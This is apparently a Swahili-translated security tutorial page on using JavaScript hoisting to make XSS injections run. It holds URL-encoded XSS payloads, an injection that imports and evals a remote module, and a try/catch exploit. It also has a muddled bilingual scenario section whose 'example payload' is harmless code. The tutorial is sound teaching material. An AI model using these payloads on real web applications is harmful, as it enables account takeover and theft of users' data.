Taarifa Msingi

Katika lugha ya JavaScript, kuna mchakato unaojulikana kama Hoisting ambapo matangazo ya variables, functions, classes, au imports yanapandishwa kwa kiwango cha juu cha wigo wao kabla ya nambari kutekelezwa. Mchakato huu unatekelezwa moja kwa moja na injini ya JavaScript, ambayo hupitia skripti kwa njia kadhaa.

Katika hatua ya kwanza, injini huchambua nambari ili kuchunguza makosa ya sintaksia na kuiweka katika muundo wa sintaksia ya kubuni. Hatua hii ni pamoja na hoisting, mchakato ambapo matangazo fulani yanahamishwa hadi kwenye muktadha wa utekelezaji. Ikiwa hatua ya uchambuzi inafanikiwa, ikionyesha hakuna makosa ya sintaksia, utekelezaji wa skripti unaendelea.

Ni muhimu kuelewa kwamba:

1. Skripti lazima iwe bila makosa ya sintaksia ili utekelezaji ufanyike. Sheria za sintaksia lazima zifuatwe kikamilifu.

2. Mahali pa nambari ndani ya skripti huathiri utekelezaji kutokana na hoisting, ingawa nambari inayotekelezwa inaweza kutofautiana na uwakilishi wake wa maandishi.

Aina za Hoisting

Kulingana na habari kutoka MDN, kuna aina nne tofauti za hoisting katika JavaScript:

1. Value Hoisting: Inawezesha matumizi ya thamani ya variable ndani ya wigo wake kabla ya mstari wa tangazo lake.

2. Declaration Hoisting: Inaruhusu kutaja variable ndani ya wigo wake kabla ya tangazo lake bila kusababisha ReferenceError, lakini thamani ya variable itakuwa undefined.

3. Aina hii inabadilisha tabia ndani ya wigo wake kutokana na tangazo la variable kabla ya mstari wake wa tangazo halisi.

4. Athari za tangazo hufanyika kabla ya nambari iliyobaki inayolihusisha kuhesabiwa.

Kwa undani, matangazo ya functions huonyesha tabia ya hoisting ya aina ya 1. Neno la msimbo var linaonyesha tabia ya aina ya 2. Matangazo ya kisarufi, ambayo ni pamoja na let, const, na class, huonyesha tabia ya aina ya 3. Hatimaye, taarifa za import ni za kipekee kwa kuwa zinapandishwa na tabia za aina ya 1 na aina ya 4.

Mazingira

Hivyo ikiwa una mazingira ambapo unaweza Kuingiza nambari ya JS baada ya kutumia kitu ambacho hakijatangazwa, unaweza kurekebisha sintaksia kwa kulitangaza (hivyo nambari yako inatekelezwa badala ya kutoa kosa):

// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};

//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)

// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
return 1
};
myFunction(a, '<INJECTION>')

//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);

// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
<INJECTION>
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
return 1;
}
alert(1);

// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesn´t exist
// cannot be fixed if you can only inject after that code:
test.cookie('leo','INJECTION')
test['cookie','injection']

Hali Zaidi

Scenario 1: JavaScript Hoisting

Skenario 1: Kusimamishwa kwa JavaScript

In this scenario, the attacker injects malicious JavaScript code into a vulnerable web application. The code is executed by the victim's browser, allowing the attacker to perform various actions on behalf of the victim.

Katika hali hii, mshambuliaji anaingiza kificho cha JavaScript chenye nia mbaya katika programu ya wavuti inayoweza kudhurika. Kificho hicho kinatekelezwa na kivinjari cha mwathiriwa, kuruhusu mshambuliaji kufanya vitendo mbalimbali kwa niaba ya mwathiriwa.

The attacker takes advantage of JavaScript hoisting, which is a behavior in JavaScript where variable and function declarations are moved to the top of their containing scope during the compilation phase. This allows the attacker to use variables and functions before they are actually declared.

Mshambuliaji anatumia kusimamishwa kwa JavaScript, ambayo ni tabia katika JavaScript ambapo matangazo ya pembejeo na kazi yanahamishwa hadi juu ya wigo wao unaohusika wakati wa hatua ya uundaji. Hii inamruhusu mshambuliaji kutumia pembejeo na kazi kabla hazijatangazwa kwa kweli.

To exploit this vulnerability, the attacker crafts a payload that includes a function declaration and a variable assignment. When the vulnerable web application executes the payload, the function and variable are hoisted to the top of their scope, allowing the attacker to manipulate the behavior of the application.

Ili kutumia udhaifu huu, mshambuliaji anatengeneza mzigo ambao una tangazo la kazi na kutoa thamani kwa pembejeo. Wakati programu ya wavuti inayoweza kudhurika inatekeleza mzigo, kazi na pembejeo zinasimamishwa hadi juu ya wigo wao, kuruhusu mshambuliaji kubadilisha tabia ya programu.

Example Payload

Mfano wa Mzigo

<script>
  alert(myFunction()); // Output: "Hello, World!"

  function myFunction() {
    return "Hello, World!";
  }
</script>

Explanation

Maelezo

In this example, the attacker injects a script tag containing JavaScript code into a vulnerable input field. The code declares a function called myFunction that returns the string "Hello, World!". The function is then called immediately after its declaration, resulting in an alert displaying the message "Hello, World!".

Katika mfano huu, mshambuliaji anaingiza lebo ya skripti inayojumuisha kificho cha JavaScript katika uga wa pembejeo unaoweza kudhurika. Kificho kinatangaza kazi inayoitwa myFunction ambayo inarudisha herufi "Hello, World!". Kazi hiyo inaitwa mara moja baada ya tangazo lake, ikisababisha onyo kuonyesha ujumbe "Hello, World!".

Impact

Athari

By exploiting JavaScript hoisting, the attacker can execute arbitrary JavaScript code within the context of the vulnerable web application. This can lead to various consequences, such as stealing sensitive information, performing unauthorized actions, or even taking control of the victim's account.

Kwa kutumia kusimamishwa kwa JavaScript, mshambuliaji anaweza kutekeleza kificho cha JavaScript cha aina yoyote ndani ya muktadha wa programu ya wavuti inayoweza kudhurika. Hii inaweza kusababisha matokeo mbalimbali, kama vile kuiba habari nyeti, kufanya vitendo visivyoruhusiwa, au hata kuchukua udhibiti wa akaunti ya mwathiriwa.

// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
// You can inject
alert(1));function x(){}//
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
x.y(1,alert(1));function x(){}//)

// Undeclared var accessing 2 nested undeclared method
x.y.z(1,INJECTION)
// You can inject
");import {x} from "https://example.com/module.js"//
// It will be executed
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")


// The imported module:
// module.js
var x = {
y: {
z: function(param) {
eval(param);
}
}
};

export { x };

// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
// It was injected the: let config;`-alert(1)`//`
// With the goal of making in the block the var config be empty, so the return is not executed
// And the same injection was replicated in the body URL to execute an alert

try {
if(config){
return;
}
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)`//`+"
} catch {
fetch("/error", {
method: "POST",
body: {
url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
}
})
}

Marejeo

• https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios

• https://developer.mozilla.org/en-US/docs/Glossary/Hoisting

• https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/